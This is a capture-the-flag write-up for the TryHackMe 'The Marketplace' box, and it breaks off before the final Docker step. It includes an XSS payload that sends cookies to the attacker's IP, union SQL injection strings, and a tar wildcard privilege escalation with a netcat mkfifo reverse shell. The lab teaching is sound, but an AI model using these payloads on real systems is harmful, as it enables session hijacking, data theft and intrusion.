TryHackMe The Marketplace Writeup

5 min readOct 15, 2022

This writeup will help you solve The Marketplace box on TryHackMe.com.

TryHackMe The Marketplace — Enumeration

As per usual, we start by scanning for open ports on the box. We do so with the following command:

nmap -sC -sV <box_ip>

We use the flags sV to scan for version numbers and sC to run some default vulnerability scrips on the target. The output is shown below:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
| 256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_ 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp open http nginx 1.19.2
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-server-header: nginx/1.19.2
|_http-title: The Marketplace
32768/tcp open http Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are only three ports open for us to interact with. Let’s start with the easiest one, port 80. Since this is a webpage without any password protection, we can get some useful information by simply visiting the web page. Browse to http://<box_ip>/.

TryHackMe The Marketplace — Flag 1

We’re met with a pretty simple looking page and only a few options.

Let’s start by signing up for an account and afterwards logging into that account. We see two new menu items New listing and Messages.

If we open one of the existing listings from Jake and Michael we find two interesting options. One being Contact the listing author and the other Report listing to admins. Seeing as contacting someone requires the other party to be online to answer we will rather focus on the report option.

Reporting the listing brings us to our messages screen where we find a new message from system. If we refresh this page we see another new message stating the following:

From system
Thank you for your report. We have reviewed the listing and found nothing that violates our rules.

Is there something that will violate their rules and give us a shot at taking over this server?

Yes there is, and it’s name is Cross Site Scripting (XSS). For XSS to work we need to find a place where we can fill in our own custom input and where that input can be executed by another person or system.

Let’s try to create a new listing. Give it a fun title and fill in the following for the description:

<script> var i = new Image(); i.src=”http://<your_ip>/”+document.cookie; </script>

After you’re done, submit your listing.

Now, for the fun part, start up a Python web server with the following command and report your own listing afterwards

python3 -m http.server

Check your web server output and you should see the following

<box_ip> — — [some_data] “GET /token=aLongTokenThatWeWillBeUsing HTTP/1.1”

Copy paste this token and replace it for your own cookie token. Refresh the page and you should see a new menu item pop up called Administration panel.

Inside this menu item is our first flag!

TryHackMe The Marketplace — Flag 2

For our second flag we are provided with a hint that it’s located in a file called user.txt. This means that we need to find some way into the server because all user.txt files are located on the server.

Now that we have access to an admin user on The Marketplace, let’s see if we can find some more vulnerabilities here. Clicking on one of the four user tabs system, michael, jake and our own user gives us a very basic info screen. We can see that the user is being requested with a query parameter in the URL user=. If we replace the number with a single quote “ We get a SQL error. This means that we can apply SQL injections!

We start by checking which database we are currently using:

<box_ip>//admin?user=1 AND 1=2 union select database(),@@version,1,1

The current admin page is rendered with four selected database fields, so we need to fill two fields with dummy data, hence the 1,1. After entering this we see User marketplace this means the current database schema is called marketplace. Next we should figure out the tables that exist within the marketplace schema:

<box_ip>//admin?user=1 AND 1=2 union select group_concat(table_name),1,1,1 from information_schema.tables where table_schema=database() —

Thanks to this injection we find out that there are 3 available tables, items, messages and users

The only thing that’s left right now is to find the available columns, we find them through the following injection:

<box_ip>//admin?user=1 AND 1=2 union select group_concat(column_name),1,1,1 from information_schema.columns where table_schema=database() —

Now we have every bit of the puzzle. Let’s check to see if Michael en Jake had a conversation through their messages:

<box_ip>//admin?user=1 AND 1=2 union select message_content,1,2,3 from messages where id=1

We have a hit! An automated message with a SSH password! We can try this password for Jake

ssh jake@<box_ip>

After logging in we can find the user.txt file inside our current working directory!

TryHackMe The Marketplace — Flag 3

Our last flag revolves around us getting root access. Let’s see what our user Jake is allowed to do on the server by executing the following

sudo -l

We see that Jake can execute a file called /opt/backups/backup.sh as the user Michael. Let’s further investigate this file.

This file suffers from a privilege escalation flaw by using tar with the * wildcard. We can exploit this by creating a reverse shell connection to the server:

jake@the-marketplace:/opt/backup$ echo > — checkpoint=1
jake@the-marketplace:/opt/backup$ echo > ‘ — checkpoint-action=exec=sh shell.sh’

Finally we create a file called shell.sh with the following content

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc &ltyour_ip> 1234 >/tmp/f

Give it execution rights by running

chmod +x shell.sh

Open a netcat listener on your local system with

nc -lvnp 1234

Now manually run the backup script with

sudo -u michael /opt/backups/backup.sh

Now we have a reverse shell connection as the user Michael!

First, make our reverse shell terminal more stable by running the following:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm-256color

Now we can take a look into what we can run as the user Michael The command id reveals that we belong to the Docker group. We can try to exploit this group with the following command: